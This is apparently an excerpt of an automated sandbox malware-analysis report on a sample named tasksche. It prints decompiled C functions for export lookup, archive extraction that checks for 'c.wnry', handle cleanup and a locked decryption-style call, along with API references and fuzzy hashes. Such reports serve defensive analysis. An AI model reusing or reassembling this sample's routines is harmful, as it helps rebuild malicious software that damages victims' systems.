                                                          • Instruction Fuzzy Hash: 0831F231008784AFDB318F28888479BBBF4EF15350F18896EF491A7380C375AD85CB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E00402924(intOrPtr* _a4, char _a8) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr* _t26;
                                                          				intOrPtr* _t28;
                                                          				void* _t29;
                                                          				intOrPtr _t30;
                                                          				void* _t32;
                                                          				signed int _t33;
                                                          				signed int _t37;
                                                          				signed short* _t41;
                                                          				intOrPtr _t44;
                                                          				intOrPtr _t49;
                                                          				intOrPtr* _t55;
                                                          				intOrPtr _t58;
                                                          				void* _t59;
                                                          
                                                          				_t26 = _a4;
                                                          				_t44 =  *((intOrPtr*)(_t26 + 4));
                                                          				_t28 =  *_t26 + 0x78;
                                                          				_v8 = _t44;
                                                          				if( *((intOrPtr*)(_t28 + 4)) == 0) {
                                                          					L11:
                                                          					SetLastError(0x7f);
                                                          					_t29 = 0;
                                                          				} else {
                                                          					_t58 =  *_t28;
                                                          					_t30 =  *((intOrPtr*)(_t58 + _t44 + 0x18));
                                                          					_t59 = _t58 + _t44;
                                                          					if(_t30 == 0 ||  *((intOrPtr*)(_t59 + 0x14)) == 0) {
                                                          						goto L11;
                                                          					} else {
                                                          						_t8 =  &_a8; // 0x402150
                                                          						if( *_t8 >> 0x10 != 0) {
                                                          							_t55 =  *((intOrPtr*)(_t59 + 0x20)) + _t44;
                                                          							_t41 =  *((intOrPtr*)(_t59 + 0x24)) + _t44;
                                                          							_a4 = 0;
                                                          							if(_t30 <= 0) {
                                                          								goto L11;
                                                          							} else {
                                                          								while(1) {
                                                          									_t32 =  *_t55 + _t44;
                                                          									_t15 =  &_a8; // 0x402150
                                                          									__imp___stricmp( *_t15, _t32);
                                                          									if(_t32 == 0) {
                                                          										break;
                                                          									}
                                                          									_a4 = _a4 + 1;
                                                          									_t55 = _t55 + 4;
                                                          									_t41 =  &(_t41[1]);
                                                          									if(_a4 <  *((intOrPtr*)(_t59 + 0x18))) {
                                                          										_t44 = _v8;
                                                          										continue;
                                                          									} else {
                                                          										goto L11;
                                                          									}
                                                          									goto L12;
                                                          								}
                                                          								_t33 =  *_t41 & 0x0000ffff;
                                                          								_t44 = _v8;
                                                          								goto L14;
                                                          							}
                                                          						} else {
                                                          							_t9 =  &_a8; // 0x402150
                                                          							_t37 =  *_t9 & 0x0000ffff;
                                                          							_t49 =  *((intOrPtr*)(_t59 + 0x10));
                                                          							if(_t37 < _t49) {
                                                          								goto L11;
                                                          							} else {
                                                          								_t33 = _t37 - _t49;
                                                          								L14:
                                                          								if(_t33 >  *((intOrPtr*)(_t59 + 0x14))) {
                                                          									goto L11;
                                                          								} else {
                                                          									_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t59 + 0x1c)) + _t33 * 4 + _t44)) + _t44;
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				L12:
                                                          				return _t29;
                                                          			}

















                                                          0x00402928
                                                          0x0040292f
                                                          0x00402934
                                                          0x00402938
                                                          0x0040293e
                                                          0x004029a5
                                                          0x004029a7
                                                          0x004029ad
                                                          0x00402940
                                                          0x00402940
                                                          0x00402942
                                                          0x00402946
                                                          0x0040294a
                                                          0x00000000
                                                          0x00402951
                                                          0x00402951
                                                          0x0040295a
                                                          0x00402971
                                                          0x00402973
                                                          0x00402977
                                                          0x0040297a
                                                          0x00000000
                                                          0x0040297c
                                                          0x00402981
                                                          0x00402983
                                                          0x00402986
                                                          0x00402989
                                                          0x00402993
                                                          0x00000000
                                                          0x00000000
                                                          0x00402995
                                                          0x00402998
                                                          0x0040299f
                                                          0x004029a3
                                                          0x0040297e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004029a3
                                                          0x004029b4
                                                          0x004029b7
                                                          0x00000000
                                                          0x004029b7
                                                          0x0040295c
                                                          0x0040295c
                                                          0x0040295c
                                                          0x00402960
                                                          0x00402965
                                                          0x00000000
                                                          0x00402967
                                                          0x00402967
                                                          0x004029ba
                                                          0x004029bd
                                                          0x00000000
                                                          0x004029bf
                                                          0x004029c8
                                                          0x004029c8
                                                          0x004029bd
                                                          0x00402965
                                                          0x0040295a
                                                          0x0040294a
                                                          0x004029af
                                                          0x004029b3

                                                          APIs
                                                          • _stricmp.MSVCRT(P!@,?,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 00402989
                                                          • SetLastError.KERNEL32(0000007F,?,0000DDB6,?,?,?,00402150,00000000,TaskStart), ref: 004029A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast_stricmp
                                                          • String ID: P!@
                                                          • API String ID: 1278613211-1774101457
                                                          • Opcode ID: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                                                          • Instruction ID: aaf1e2d36ba78ebe43aa6e6aad127835d86855a49192f4e92224227a9dbc2408
                                                          • Opcode Fuzzy Hash: 03c3627be8870cecb91afdd38bef801573c0f783d9791e09bb9b18ce57a97af9
                                                          • Instruction Fuzzy Hash: 432180B1700605EFDB14CF19DA8486A73F6EF89310B29857AE846EB381D678ED41CB85
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 89%
                                                          			E00401DFE(void* __eax) {
                                                          				int _t21;
                                                          				signed int _t27;
                                                          				signed int _t29;
                                                          				void* _t34;
                                                          				void* _t36;
                                                          				void* _t38;
                                                          				void* _t40;
                                                          				void* _t41;
                                                          				void* _t43;
                                                          
                                                          				_t36 = __eax;
                                                          				_t41 = _t40 + 0xc;
                                                          				if(__eax != 0) {
                                                          					 *(_t38 - 0x12c) =  *(_t38 - 0x12c) & 0x00000000;
                                                          					_t29 = 0x4a;
                                                          					memset(_t38 - 0x128, 0, _t29 << 2);
                                                          					E004075C4(_t36, 0xffffffff, _t38 - 0x12c);
                                                          					_t27 =  *(_t38 - 0x12c);
                                                          					_t43 = _t41 + 0x18;
                                                          					_t34 = 0;
                                                          					if(_t27 > 0) {
                                                          						do {
                                                          							E004075C4(_t36, _t34, _t38 - 0x12c);
                                                          							_t21 = strcmp(_t38 - 0x128, "c.wnry");
                                                          							_t43 = _t43 + 0x14;
                                                          							if(_t21 != 0 || GetFileAttributesA(_t38 - 0x128) == 0xffffffff) {
                                                          								E0040763D(_t36, _t34, _t38 - 0x128);
                                                          								_t43 = _t43 + 0xc;
                                                          							}
                                                          							_t34 = _t34 + 1;
                                                          						} while (_t34 < _t27);
                                                          					}
                                                          					E00407656(_t36);
                                                          					_push(1);
                                                          					_pop(0);
                                                          				} else {
                                                          				}
                                                          				return 0;
                                                          			}












                                                          0x00401dfe
                                                          0x00401e00
                                                          0x00401e05
                                                          0x00401e0e
                                                          0x00401e1a
                                                          0x00401e21
                                                          0x00401e2d
                                                          0x00401e32
                                                          0x00401e38
                                                          0x00401e3b
                                                          0x00401e3f
                                                          0x00401e41
                                                          0x00401e4a
                                                          0x00401e5b
                                                          0x00401e60
                                                          0x00401e65
                                                          0x00401e82
                                                          0x00401e87
                                                          0x00401e87
                                                          0x00401e8a
                                                          0x00401e8b
                                                          0x00401e41
                                                          0x00401e90
                                                          0x00401e96
                                                          0x00401e98
                                                          0x00401e07
                                                          0x00401e07
                                                          0x00401e9d

                                                          APIs
                                                          • strcmp.MSVCRT(?,c.wnry,?,00000000,?), ref: 00401E5B
                                                          • GetFileAttributesA.KERNEL32(?), ref: 00401E6E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesFilestrcmp
                                                          • String ID: c.wnry
                                                          • API String ID: 3324900478-3240288721
                                                          • Opcode ID: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                                                          • Instruction ID: 6f95607eaad4b3b0c5796a2914108af7bfa48759f01996e65d2c9759274caab0
                                                          • Opcode Fuzzy Hash: cc95b26050e750b8ddedfaa82b6fbbed5bde767aecf08ad1744914d0cf1c8067
                                                          • Instruction Fuzzy Hash: 3001C872D041142ADB209625DC41FEF336C9B45374F1005B7FA44F11C1E739AA998ADA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 84%
                                                          			E00405C9F(signed int __eax, intOrPtr _a4) {
                                                          				intOrPtr _t9;
                                                          
                                                          				_t9 = _a4;
                                                          				if(_t9 != 0) {
                                                          					if( *((char*)(_t9 + 0x10)) != 0) {
                                                          						CloseHandle( *(_t9 + 4));
                                                          					}
                                                          					_push(_t9);
                                                          					L004076E8();
                                                          					return 0;
                                                          				} else {
                                                          					return __eax | 0xffffffff;
                                                          				}
                                                          			}




                                                          0x00405ca0
                                                          0x00405ca6
                                                          0x00405cb1
                                                          0x00405cb6
                                                          0x00405cb6
                                                          0x00405cbc
                                                          0x00405cbd
                                                          0x00405cc6
                                                          0x00405ca8
                                                          0x00405cac
                                                          0x00405cac

                                                          APIs
                                                          • CloseHandle.KERNEL32(?,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CB6
                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,$l@,00406118,$l@,?,00000000,00000000), ref: 00405CBD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ??3@CloseHandle
                                                          • String ID: $l@
                                                          • API String ID: 3816424416-2140230165
                                                          • Opcode ID: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                                                          • Instruction ID: 673c02d0cae411eac5e44946f87937de45fd09569792d44698d585129e0307c2
                                                          • Opcode Fuzzy Hash: 95d67fc171dea6c803f2538cd8e9bf2129e8d776d8110548eb6437a9e23f5d7b
                                                          • Instruction Fuzzy Hash: 47D05E3280DE211BE7226A28B90469B2B949F01330F054A6EE4A1A25E2D7789C8596CC
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 25%
                                                          			E004019E1(void* __ecx, void* _a4, int _a8, void* _a12, int* _a16) {
                                                          				void* _t13;
                                                          				void* _t16;
                                                          				struct _CRITICAL_SECTION* _t19;
                                                          				void* _t20;
                                                          
                                                          				_t20 = __ecx;
                                                          				if( *((intOrPtr*)(__ecx + 8)) == 0) {
                                                          					L3:
                                                          					return 0;
                                                          				}
                                                          				_t19 = __ecx + 0x10;
                                                          				EnterCriticalSection(_t19);
                                                          				_t13 =  *0x40f8a4( *((intOrPtr*)(_t20 + 8)), 0, 1, 0, _a4,  &_a8);
                                                          				_push(_t19);
                                                          				if(_t13 != 0) {
                                                          					LeaveCriticalSection();
                                                          					memcpy(_a12, _a4, _a8);
                                                          					 *_a16 = _a8;
                                                          					_t16 = 1;
                                                          					return _t16;
                                                          				}
                                                          				LeaveCriticalSection();
                                                          				goto L3;
                                                          			}







                                                          0x004019e5
                                                          0x004019ec
                                                          0x00401a19
                                                          0x00000000
                                                          0x00401a19
                                                          0x004019ee
                                                          0x004019f2
                                                          0x00401a08
                                                          0x00401a10
                                                          0x00401a11
                                                          0x00401a1d
                                                          0x00401a2c
                                                          0x00401a3a
                                                          0x00401a3e
                                                          0x00000000
                                                          0x00401a3e
                                                          0x00401a13
                                                          0x00000000

                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,00401642,?,?,?,?), ref: 004019F2
                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A13
                                                          • LeaveCriticalSection.KERNEL32(?,?,?,00401642,?,?,?,?), ref: 00401A1D
                                                          • memcpy.MSVCRT(?,?,?,?,?,00401642,?,?,?,?), ref: 00401A2C
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.312405866.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000009.00000002.312392795.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312426244.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312438817.000000000040E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000009.00000002.312446247.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$Leave$Entermemcpy
                                                          • String ID:
                                                          • API String ID: 3435569088-0
                                                          • Opcode ID: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                                                          • Instruction ID: 582611ac2dab466912340a9d1f37a03f8b1d3421f3d1388c7c0078807ea36f1a
                                                          • Opcode Fuzzy Hash: fd5125ef58b43d2b94afe930c36afa05085028d191ff952fa05313044055aa85
                                                          • Instruction Fuzzy Hash: 7FF0A432200204FFEB119F90DD05FAA3769EF44710F008439F945AA1A0D7B5A854DB65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%